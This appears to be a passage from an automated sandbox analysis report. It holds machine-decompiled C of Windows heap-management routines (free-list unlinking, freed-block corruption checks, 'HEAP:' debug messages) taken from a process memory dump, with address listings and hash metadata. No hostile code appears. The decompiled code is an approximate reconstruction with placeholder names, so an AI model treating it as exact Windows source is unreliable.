								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E00A1D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E009CB150();
								} else {
									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E009CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0xab6378 = 1;
									asm("int3");
									 *0xab6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E00A7FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E00A8A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E00A1D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E009CB150();
													} else {
														E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E009CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0xab6378 = 1;
														asm("int3");
														 *0xab6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E009EA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E009EA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E009EBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E00A8A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E00A1D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E009CB150();
													} else {
														E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E009CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0xab6378 = 1;
														asm("int3");
														 *0xab6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E009EA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E009EA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E009EBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E009EBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                                                                                          0x009e99ca
                                                                                                                          0x009e99cc
                                                                                                                          0x009e99df
                                                                                                                          0x009e99e3
                                                                                                                          0x009e99f8
                                                                                                                          0x009e99fb
                                                                                                                          0x009e99fb
                                                                                                                          0x00000000
                                                                                                                          0x009e9a48
                                                                                                                          0x009e9a48
                                                                                                                          0x009e9a4c
                                                                                                                          0x009e9a51
                                                                                                                          0x009e9a55
                                                                                                                          0x009e9a61
                                                                                                                          0x009e9a66
                                                                                                                          0x009e9a68
                                                                                                                          0x00a31457
                                                                                                                          0x00a3145c
                                                                                                                          0x00a3145c
                                                                                                                          0x009e9a68
                                                                                                                          0x009e9a6e
                                                                                                                          0x009e9a71
                                                                                                                          0x009e9a74
                                                                                                                          0x009e9a76
                                                                                                                          0x00a31466
                                                                                                                          0x00a31469
                                                                                                                          0x00a31469
                                                                                                                          0x00a3146c
                                                                                                                          0x00a3146e
                                                                                                                          0x00a31471
                                                                                                                          0x00a31474
                                                                                                                          0x00a31477
                                                                                                                          0x00a31479
                                                                                                                          0x00a3159c
                                                                                                                          0x00a3159c
                                                                                                                          0x00a3159d
                                                                                                                          0x00a315a6
                                                                                                                          0x00a315ab
                                                                                                                          0x00a315ab
                                                                                                                          0x00000000
                                                                                                                          0x00a315ab
                                                                                                                          0x00a3147f
                                                                                                                          0x00a31481
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a3148a
                                                                                                                          0x00a3148d
                                                                                                                          0x00a31493
                                                                                                                          0x00a31495
                                                                                                                          0x00a314c0
                                                                                                                          0x00a314c0
                                                                                                                          0x00a314c3
                                                                                                                          0x00a314c6
                                                                                                                          0x00a314c8
                                                                                                                          0x00a314cb
                                                                                                                          0x00a314cf
                                                                                                                          0x00a314f2
                                                                                                                          0x00a314f2
                                                                                                                          0x00a314f5
                                                                                                                          0x00a314f8
                                                                                                                          0x00a31501
                                                                                                                          0x00a31508
                                                                                                                          0x00a3150b
                                                                                                                          0x00a3150e
                                                                                                                          0x00a31510
                                                                                                                          0x00a31513
                                                                                                                          0x00a31515
                                                                                                                          0x00a31515
                                                                                                                          0x00a31518
                                                                                                                          0x00a31518
                                                                                                                          0x00a31513
                                                                                                                          0x00a31521
                                                                                                                          0x00a31525
                                                                                                                          0x00a3152a
                                                                                                                          0x00a3152d
                                                                                                                          0x00a31530
                                                                                                                          0x00a31532
                                                                                                                          0x00a31539
                                                                                                                          0x00a3153d
                                                                                                                          0x00a3155d
                                                                                                                          0x00a31562
                                                                                                                          0x00a3153f
                                                                                                                          0x00a31555
                                                                                                                          0x00a3155a
                                                                                                                          0x00a31570
                                                                                                                          0x00a31577
                                                                                                                          0x00a3157c
                                                                                                                          0x00a31582
                                                                                                                          0x00a31585
                                                                                                                          0x00a31589
                                                                                                                          0x00a3158b
                                                                                                                          0x00a31592
                                                                                                                          0x00a31593
                                                                                                                          0x00a31593
                                                                                                                          0x00a31589
                                                                                                                          0x00a31530
                                                                                                                          0x00000000
                                                                                                                          0x00a314f8
                                                                                                                          0x00a314d5
                                                                                                                          0x00a314da
                                                                                                                          0x00a314dc
                                                                                                                          0x00000000
                                                                                                                          0x00a314de
                                                                                                                          0x00a314e8
                                                                                                                          0x00000000
                                                                                                                          0x00a314e8
                                                                                                                          0x00a31497
                                                                                                                          0x00a31497
                                                                                                                          0x00a314a4
                                                                                                                          0x00a314a4
                                                                                                                          0x00a314a7
                                                                                                                          0x00a314a9
                                                                                                                          0x00a314ab
                                                                                                                          0x00a314ab
                                                                                                                          0x00a3149c
                                                                                                                          0x00a3149e
                                                                                                                          0x00a314a0
                                                                                                                          0x00a314b0
                                                                                                                          0x00a314b0
                                                                                                                          0x00000000
                                                                                                                          0x00a314a2
                                                                                                                          0x00a314a2
                                                                                                                          0x00000000
                                                                                                                          0x00a314a2
                                                                                                                          0x00a314a0
                                                                                                                          0x00a314b3
                                                                                                                          0x00a314bb
                                                                                                                          0x00000000
                                                                                                                          0x00a314bb
                                                                                                                          0x00a31495
                                                                                                                          0x009e9a7c
                                                                                                                          0x009e9a7c
                                                                                                                          0x009e9a7f
                                                                                                                          0x009e9a7f
                                                                                                                          0x009e9a82
                                                                                                                          0x009e9a84
                                                                                                                          0x009e9a87
                                                                                                                          0x009e9a8a
                                                                                                                          0x009e9a8d
                                                                                                                          0x009e9a8f
                                                                                                                          0x00a3166a
                                                                                                                          0x00a3166a
                                                                                                                          0x00a3166b
                                                                                                                          0x00a31674
                                                                                                                          0x00000000
                                                                                                                          0x00a31674
                                                                                                                          0x009e9a95
                                                                                                                          0x009e9a97
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009e9aa0
                                                                                                                          0x009e9aa3
                                                                                                                          0x009e9aa9
                                                                                                                          0x009e9aab
                                                                                                                          0x009e9ad7
                                                                                                                          0x009e9ad7
                                                                                                                          0x009e9ada
                                                                                                                          0x009e9add
                                                                                                                          0x009e9adf
                                                                                                                          0x009e9ae2
                                                                                                                          0x009e9ae6
                                                                                                                          0x009e9b22
                                                                                                                          0x009e9b27
                                                                                                                          0x009e9b29
                                                                                                                          0x00000000
                                                                                                                          0x009e9b2b
                                                                                                                          0x00a315be
                                                                                                                          0x00000000
                                                                                                                          0x00a315be
                                                                                                                          0x009e9b29
                                                                                                                          0x009e9ae8
                                                                                                                          0x009e9ae8
                                                                                                                          0x009e9aeb
                                                                                                                          0x009e9aee
                                                                                                                          0x00a315cb
                                                                                                                          0x00a315d2
                                                                                                                          0x00a315d5
                                                                                                                          0x00a315d7
                                                                                                                          0x00a315da
                                                                                                                          0x00a315dc
                                                                                                                          0x00a315dc
                                                                                                                          0x00a315dc
                                                                                                                          0x00a315da
                                                                                                                          0x00a315e5
                                                                                                                          0x00a315e9
                                                                                                                          0x00a315ee
                                                                                                                          0x00a315f1
                                                                                                                          0x00a315f3
                                                                                                                          0x00a315f9
                                                                                                                          0x00a31600
                                                                                                                          0x00a31604
                                                                                                                          0x00a31624
                                                                                                                          0x00a31629
                                                                                                                          0x00a31606
                                                                                                                          0x00a3161c
                                                                                                                          0x00a31621
                                                                                                                          0x00a31637
                                                                                                                          0x00a3163e
                                                                                                                          0x00a31643
                                                                                                                          0x00a31649
                                                                                                                          0x00a3164c
                                                                                                                          0x00a31650
                                                                                                                          0x00a31656
                                                                                                                          0x00a3165d
                                                                                                                          0x00a3165e
                                                                                                                          0x00a3165e
                                                                                                                          0x00a31650
                                                                                                                          0x00a315f3
                                                                                                                          0x009e9af4
                                                                                                                          0x009e9af7
                                                                                                                          0x009e9afc
                                                                                                                          0x009e9b00
                                                                                                                          0x009e9b04
                                                                                                                          0x009e9b08
                                                                                                                          0x009e9b14
                                                                                                                          0x009e99fe
                                                                                                                          0x009e9a04
                                                                                                                          0x009e9a07
                                                                                                                          0x00000000
                                                                                                                          0x009e9a29
                                                                                                                          0x00a3169c
                                                                                                                          0x00a316a0
                                                                                                                          0x00a316a5
                                                                                                                          0x00a316a9
                                                                                                                          0x00a316b5
                                                                                                                          0x00a316ba
                                                                                                                          0x00a316bc
                                                                                                                          0x00a316be
                                                                                                                          0x00a316c3
                                                                                                                          0x00a316c3
                                                                                                                          0x00a316bc
                                                                                                                          0x00a316c8
                                                                                                                          0x00a316cc
                                                                                                                          0x00a3181b
                                                                                                                          0x00a3181b
                                                                                                                          0x00a3181e
                                                                                                                          0x00a3181e
                                                                                                                          0x00a31821
                                                                                                                          0x00a31823
                                                                                                                          0x00a31826
                                                                                                                          0x00a31829
                                                                                                                          0x00a3182c
                                                                                                                          0x00a3182e
                                                                                                                          0x00a31688
                                                                                                                          0x00a31688
                                                                                                                          0x00a31689
                                                                                                                          0x00a3168b
                                                                                                                          0x00a3168c
                                                                                                                          0x00a3168d
                                                                                                                          0x00a3168f
                                                                                                                          0x00a31692
                                                                                                                          0x00000000
                                                                                                                          0x00a31692
                                                                                                                          0x00a31834
                                                                                                                          0x00a31836
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a3183f
                                                                                                                          0x00a31842
                                                                                                                          0x00a31848
                                                                                                                          0x00a3184a
                                                                                                                          0x00a31875
                                                                                                                          0x00a31875
                                                                                                                          0x00a31878
                                                                                                                          0x00a3187b
                                                                                                                          0x00a3187d
                                                                                                                          0x00a31880
                                                                                                                          0x00a31884
                                                                                                                          0x00a318a7
                                                                                                                          0x00a318a7
                                                                                                                          0x00a318aa
                                                                                                                          0x00a318ad
                                                                                                                          0x00a318b6
                                                                                                                          0x00a318bd
                                                                                                                          0x00a318c0
                                                                                                                          0x00a318c3
                                                                                                                          0x00a318c5
                                                                                                                          0x00a318c8
                                                                                                                          0x00a318ca
                                                                                                                          0x00a318ca
                                                                                                                          0x00a318cd
                                                                                                                          0x00a318cd
                                                                                                                          0x00a318c8
                                                                                                                          0x00a318d5
                                                                                                                          0x00a318da
                                                                                                                          0x00a318df
                                                                                                                          0x00a318e2
                                                                                                                          0x00a318e5
                                                                                                                          0x00a318e7
                                                                                                                          0x00a318ee
                                                                                                                          0x00a318f2
                                                                                                                          0x00a31912
                                                                                                                          0x00a31917
                                                                                                                          0x00a318f4
                                                                                                                          0x00a3190a
                                                                                                                          0x00a3190f
                                                                                                                          0x00a31925
                                                                                                                          0x00a3192c
                                                                                                                          0x00a31931
                                                                                                                          0x00a3193a
                                                                                                                          0x00a3193e
                                                                                                                          0x00a31940
                                                                                                                          0x00a31947
                                                                                                                          0x00a31948
                                                                                                                          0x00a31948
                                                                                                                          0x00a3193e
                                                                                                                          0x00a318e5
                                                                                                                          0x00a3194f
                                                                                                                          0x00a31952
                                                                                                                          0x00a31956
                                                                                                                          0x00a3195d
                                                                                                                          0x00a31961
                                                                                                                          0x00a3196d
                                                                                                                          0x00000000
                                                                                                                          0x00a3196d
                                                                                                                          0x00a3188a
                                                                                                                          0x00a3188f
                                                                                                                          0x00a31891
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a3189d
                                                                                                                          0x00000000
                                                                                                                          0x00a3189d
                                                                                                                          0x00a3184c
                                                                                                                          0x00a31859
                                                                                                                          0x00a31859
                                                                                                                          0x00a3185c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a31851
                                                                                                                          0x00a31853
                                                                                                                          0x00a31855
                                                                                                                          0x00a31865
                                                                                                                          0x00a31865
                                                                                                                          0x00a31866
                                                                                                                          0x00a31868
                                                                                                                          0x00a31870
                                                                                                                          0x00000000
                                                                                                                          0x00a31870
                                                                                                                          0x00a31857
                                                                                                                          0x00a31857
                                                                                                                          0x00a3185e
                                                                                                                          0x00000000
                                                                                                                          0x00a316d2
                                                                                                                          0x00a316d2
                                                                                                                          0x00a316d5
                                                                                                                          0x00a316d5
                                                                                                                          0x00a316d8
                                                                                                                          0x00a316da
                                                                                                                          0x00a316dd
                                                                                                                          0x00a316e0
                                                                                                                          0x00a316e3
                                                                                                                          0x00a316e5
                                                                                                                          0x00a31808
                                                                                                                          0x00a31808
                                                                                                                          0x00a31809
                                                                                                                          0x00a31812
                                                                                                                          0x00a31817
                                                                                                                          0x00a31817
                                                                                                                          0x00000000
                                                                                                                          0x00a31817
                                                                                                                          0x00a316eb
                                                                                                                          0x00a316ed
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a316f6
                                                                                                                          0x00a316f9
                                                                                                                          0x00a316ff
                                                                                                                          0x00a31701
                                                                                                                          0x00a3172c
                                                                                                                          0x00a3172c
                                                                                                                          0x00a3172f
                                                                                                                          0x00a31732
                                                                                                                          0x00a31734
                                                                                                                          0x00a31737
                                                                                                                          0x00a3173b
                                                                                                                          0x00a3175e
                                                                                                                          0x00a3175e
                                                                                                                          0x00a31761
                                                                                                                          0x00a31764
                                                                                                                          0x00a3176d
                                                                                                                          0x00a31774
                                                                                                                          0x00a31777
                                                                                                                          0x00a3177a
                                                                                                                          0x00a3177c
                                                                                                                          0x00a3177f
                                                                                                                          0x00a31781
                                                                                                                          0x00a31781
                                                                                                                          0x00a31784
                                                                                                                          0x00a31784
                                                                                                                          0x00a3177f
                                                                                                                          0x00a3178c
                                                                                                                          0x00a31791
                                                                                                                          0x00a31796
                                                                                                                          0x00a31799
                                                                                                                          0x00a3179c
                                                                                                                          0x00a3179e
                                                                                                                          0x00a317a5
                                                                                                                          0x00a317a9
                                                                                                                          0x00a317c9
                                                                                                                          0x00a317ce
                                                                                                                          0x00a317ab
                                                                                                                          0x00a317c1
                                                                                                                          0x00a317c6
                                                                                                                          0x00a317dc
                                                                                                                          0x00a317e3
                                                                                                                          0x00a317e8
                                                                                                                          0x00a317ee
                                                                                                                          0x00a317f1
                                                                                                                          0x00a317f5
                                                                                                                          0x00a317f7
                                                                                                                          0x00a317fe
                                                                                                                          0x00a317ff
                                                                                                                          0x00a317ff
                                                                                                                          0x00a317f5
                                                                                                                          0x00a3179c
                                                                                                                          0x00000000
                                                                                                                          0x00a31764
                                                                                                                          0x00a31741
                                                                                                                          0x00a31746
                                                                                                                          0x00a31748
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a31754
                                                                                                                          0x00000000
                                                                                                                          0x00a31754
                                                                                                                          0x00a31703
                                                                                                                          0x00a31710
                                                                                                                          0x00a31710
                                                                                                                          0x00a31713
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a31708
                                                                                                                          0x00a3170a
                                                                                                                          0x00a3170c
                                                                                                                          0x00a3171c
                                                                                                                          0x00a3171c
                                                                                                                          0x00a3171d
                                                                                                                          0x00a3171f
                                                                                                                          0x00a31727
                                                                                                                          0x00000000
                                                                                                                          0x00a31727
                                                                                                                          0x00a3170e
                                                                                                                          0x00a3170e
                                                                                                                          0x00a31715
                                                                                                                          0x00000000
                                                                                                                          0x00a31715
                                                                                                                          0x00a316cc
                                                                                                                          0x009e9a45
                                                                                                                          0x009e9a45
                                                                                                                          0x009e9a0e
                                                                                                                          0x009e9a1c
                                                                                                                          0x009e9a23
                                                                                                                          0x00a3167e
                                                                                                                          0x00a3167f
                                                                                                                          0x00a31681
                                                                                                                          0x00a31683
                                                                                                                          0x00a31684
                                                                                                                          0x00000000
                                                                                                                          0x00a31684
                                                                                                                          0x00000000
                                                                                                                          0x009e9aad
                                                                                                                          0x009e9aad
                                                                                                                          0x009e9ab0
                                                                                                                          0x009e9ab3
                                                                                                                          0x009e9ab3
                                                                                                                          0x009e9ab6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009e9ab8
                                                                                                                          0x009e9aba
                                                                                                                          0x009e9abc
                                                                                                                          0x009e9ac8
                                                                                                                          0x009e9ac8
                                                                                                                          0x00000000
                                                                                                                          0x009e9abe
                                                                                                                          0x009e9abe
                                                                                                                          0x009e9ac0
                                                                                                                          0x00000000
                                                                                                                          0x009e9ac0
                                                                                                                          0x009e9abc
                                                                                                                          0x009e9ad2
                                                                                                                          0x00000000
                                                                                                                          0x009e9ad2
                                                                                                                          0x009e9aab

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                          • API String ID: 0-3178619729
                                                                                                                          • Opcode ID: f2472bad66de530ab173a01c5a54f318105dc8945ccd38de4a60f94700dc1208
                                                                                                                          • Instruction ID: 73db6e83a7e0b8e2020fd41147e0fad6a147a801e7f73a7599fc03da64c2d9af
                                                                                                                          • Opcode Fuzzy Hash: f2472bad66de530ab173a01c5a54f318105dc8945ccd38de4a60f94700dc1208
                                                                                                                          • Instruction Fuzzy Hash: 9722F070A002419FDB25CF69C896B7ABBF5EF85704F288569F4468B382E735EC85CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009EB477, Relevance: 4.2, Strings: 3, Instructions: 405COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 67%
                                                                                                                          			E009EB477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0xabd360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E009EB8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E00A0B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0xab8748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E009CB150();
						} else {
							E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E009CB150();
						__eflags =  *0xab7bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E00A82073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0xab8a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0xabb1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E00A09730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E00A8A80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E00A09660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
